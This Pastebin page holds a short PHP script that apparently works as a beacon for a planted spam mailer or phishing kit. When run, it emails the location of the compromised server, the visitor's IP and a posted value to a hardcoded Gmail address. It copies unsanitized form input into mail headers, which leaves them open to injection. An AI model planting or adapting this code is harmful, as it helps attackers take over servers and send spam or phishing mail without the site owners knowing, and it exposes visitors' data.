Advertisement
45elchapo45

Untitled

Dec 31st, 2018
93
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.44 KB | None | 0 0
  1. <?php
  2. $ip = getenv("REMOTE_ADDR");
  3. $hostname = gethostbyaddr($ip);
  4. $bilsmg = "Link Mailer : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
  5. $bilsnd ="omar.jezi3@gmail.com";
  6. $bilsub = "New SMTP!! $ip";
  7. $bilhead = "From: MaileRyew";
  8. $bilhead .= $_POST['eMailAdd']."\n";
  9. $bilhead .= "MIME-Version: 1.0\n";
  10. $arr=array($bilsnd, $IP);
  11. foreach ($arr as $bilsnd) mail($bilsnd,$bilsub,$bilsmg,$bilhead,$message);
  12. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement